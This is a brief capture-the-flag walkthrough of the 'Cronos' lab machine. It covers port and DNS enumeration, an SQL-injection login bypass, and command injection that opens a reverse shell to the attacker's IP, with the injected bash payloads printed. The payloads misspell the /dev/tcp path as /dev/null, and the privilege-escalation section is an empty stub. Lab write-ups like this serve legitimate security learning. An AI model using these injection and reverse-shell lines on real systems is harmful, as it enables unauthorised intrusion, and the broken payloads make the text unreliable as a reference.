🟡cronos

Recon & Enumeration

port scan

22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

DNS resolve

i used nslookup <interactive> and got a domain "ns1.cronos.htb" , then its parent domain is must be "cronos.htb" then i used host command to get all the subdomains

cronos.htb
ns1.cronos.htb
www.cronos.htb
admin.cronos.htb

https://10.10.10.13

Basic apache web-page , no use

cronos.htb

Its a working domain , but no functionality

admin.cronos.htb

shell as www-data

Login form , i tried default creds ....but failed , then i tried sql injection to bypass authentication and got succeeded Inside the page , their is functionality through which we can tracerout or ping any ip i intercept the request in burp and tried to get a reverse shell by command injection , but i failed and failed again this is bcoz i was injecting only in first parameter "command" , then i injected in 2nd parameter "host" and got the reverse shell

command=tracerout|bash -i >& /dev/null/10.10.16.8/1234 0>&1 host=8.8.8.8
fails

command=ping|bash -i >& /dev/null/10.10.16.8/1234 0>&1 host=8.8.8.8
fails

command=tracerout host=8.8.8.8|bash -i >& /dev/null/10.10.16.8/1234 0>&1
got the shell

privesc www-data => guly

sds

Previouspending stuff Nexttime

Last updated 2 years ago

hashtagRecon & Enumeration

hashtagport scan

hashtagDNS resolve

hashtaghttps://10.10.10.13

hashtagcronos.htb

hashtagadmin.cronos.htb

hashtagshell as www-data

hashtagprivesc www-data => guly